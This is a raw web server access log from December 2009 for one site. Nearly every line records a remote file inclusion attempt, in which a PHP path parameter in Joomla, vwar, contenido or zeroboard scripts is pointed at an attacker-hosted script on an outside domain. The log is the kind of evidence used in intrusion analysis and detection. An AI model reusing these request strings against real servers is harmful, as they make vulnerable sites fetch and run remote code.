93.174.0.38 - - [13/Dec/2009:12:42:12 -0800] "GET /logs/access_090909.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:13 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:13 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:14 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:14 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:14 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:14 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:20 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:20 -0800] "GET /logs/access_090124.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:42:31 -0800] "GET /logs/access_081010.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:42:32 -0800] "GET /logs/access_080703.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:42:33 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:42:42 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:42:42 -0800] "GET /logs/access_081002.log/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:42:42 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:42:59 -0800] "GET /logs/access_080828.log/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:02 -0800] "GET /logs/access_081120.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:02 -0800] "GET /logs/access_090523.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:10 -0800] "GET /logs/access_081120.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:10 -0800] "GET /logs/access_090523.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:13 -0800] "GET /logs/access_090523.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:13 -0800] "GET /logs/access_081120.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:16 -0800] "GET /logs/access_081120.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:16 -0800] "GET /logs/access_090523.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:18 -0800] "GET /logs/access_081120.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:43:18 -0800] "GET /logs/access_090523.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:43:29 -0800] "GET /logs/access_090422.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:43:34 -0800] "GET /logs/access_090805.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:13 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:13 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:15 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:15 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:44:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:44:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:44:40 -0800] "GET /logs/access_080624.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:44:40 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:44:44 -0800] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:18 -0800] "GET /logs/access_090210.log//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:18 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:45:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:45:19 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:45:19 -0800] "GET /logs/access_080624.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:20 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:20 -0800] "GET /logs/access_090210.log//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:45:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:45:25 -0800] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:46:05 -0800] "GET /logs/access_090511.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:46:11 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:46:11 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:46:11 -0800] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:46:17 -0800] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:21 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:21 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:22 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:22 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:36 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:36 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:36 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:47:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:21 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:21 -0800] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:27 -0800] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:40 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:40 -0800] "GET /logs/access_090326.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:48:44 -0800] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:49:51 -0800] "GET /logs/access_090210.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:50:05 -0800] "GET /logs/access_090210.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:50:17 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:50:17 -0800] "GET /logs/access_090824.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:50:18 -0800] "GET /logs/access_090510.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:50:19 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:21 -0800] "GET /logs/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:21 -0800] "GET /logs/access_081231.log/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:21 -0800] "GET /zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:25 -0800] "GET /logs/access_081231.log%20%20/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:25 -0800] "GET /zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:25 -0800] "GET /logs/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:29 -0800] "GET /logs/access_080531.log/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:29 -0800] "GET /logs/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:29 -0800] "GET /logs/access_081231.log/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:29 -0800] "GET /zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:32 -0800] "GET /logs/access_080531.log%20%20/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:50:42 -0800] "GET /logs/access_080531.log/zb41/include/write.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:50:54 -0800] "GET /logs/access_080624.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.117.195 - - [13/Dec/2009:12:50:59 -0800] "GET /logs/access_080127.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:56 -0800] "GET /logs/access_091020.log%20%20/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:56 -0800] "GET /step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:56 -0800] "GET /logs/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:57 -0800] "GET /logs/access_091020.log%20%20/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:57 -0800] "GET /logs/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:51:57 -0800] "GET /step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:52:02 -0800] "GET /logs/access_081010.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:52:26 -0800] "GET /logs/access_080703.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:53:01 -0800] "GET /logs/access_090513.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:53:06 -0800] "GET /logs/access_090824.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:53:44 -0800] "GET /logs/access_091020.log/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:53:44 -0800] "GET /logs/access_081218.log/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:53:44 -0800] "GET /logs/access_091020.log/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [13/Dec/2009:12:53:44 -0800] "GET /logs/access_081218.log/step_one_tables.php?server_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:54:51 -0800] "GET /logs/access_091001.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.100.181.217 - - [13/Dec/2009:12:55:15 -0800] "GET /logs/access_090815.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:30 -0800] "GET /skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:30 -0800] "GET /logs/access_090510.log//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:35 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:37 -0800] "GET /skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:37 -0800] "GET /logs/access_090510.log//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:57:41 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:56 -0800] "GET /logs/access_090616.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
